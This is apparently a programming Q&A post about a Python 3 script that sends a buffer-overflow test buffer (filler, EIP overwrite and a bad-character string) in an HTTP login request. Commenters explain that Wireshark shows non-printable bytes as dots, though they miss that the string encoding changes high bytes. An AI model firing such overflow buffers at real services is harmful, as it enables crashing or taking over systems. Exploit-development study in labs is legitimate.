# How to encode escaped hex for http request in Python3?

Tags: python, python-3.x, linux, encoding, buffer-overflow

The Python3 script below works fine if I remove 'badchars' from the script. However when I include 'badchars' in the content of my http request, I can see in Wireshark that there are a couple empty bytes between for some reason (see image)

[image]

What do I need to do to successfully pass the badchars with my other http content without empty bytes?

```
#!/usr/bin/python3
import sys
import time
import socket
import warnings

targetip = "192.168.168.10"
targetport = 80

try:
    #prepare input buffer
    filler = "A" * 780
    eip = "BBBB"
    offset = "C" * 4
    badchars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

    inputBuffer = filler + eip + offset + badchars
    print("=" * 50)
    print("Sending evil buffer with %s bytes:" % len(inputBuffer))
    print("=" * 50)
    #construct http request payload
    content = "username="+ inputBuffer + "&password=A"
    request = "POST /login HTTP/1.1\r\n"
    request += "Host: 192.168.168.10\r\n"
    request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
    request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    request += "Accept-Language: en-US,en;q=0.5\r\n"
    request += "Accept-Encoding: gzip, deflate\r\n"
    request += "Content-Type: application/x-www-form-urlencoded\r\n"
    request += "Content-Length: "+str(len(content))+"\r\n"
    request += "\r\n"
    request += content
    #print http request to be sent to target
    print (request.encode())
            
    #connect to target and send payload
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((targetip, targetport))
    s.send(request.encode())
    s.close()
    print("=" * 50)
    print("Complete!")
    print("=" * 50)
except:
    print ("\nCould not connect!")
    sys.exit(0)
sys.exit(0)
```

Comment: *"there are a couple empty bytes between for some reason"* Where? The `.`s? They're not empty bytes, they're non-printable characters, look at the hex instead, your "`badchars`" are clearly all there

Comment: This is well described in the documentation in [Section 3.20](https://www.wireshark.org/docs/wsug_html_chunked/ChUsePacketBytesPaneSection.html): *"The “Packet Bytes” pane shows a canonical hex dump of the packet data. Each line contains the data offset, sixteen hexadecimal bytes, and sixteen ASCII bytes.* ***Non-printable bytes are replaced with a period (“.”).*** *"* - It's also the format that most (or at least a lot of) hex dumps use.

Comment: Thanks for clearing that up for me, wasn't aware of the non-printable bytes :S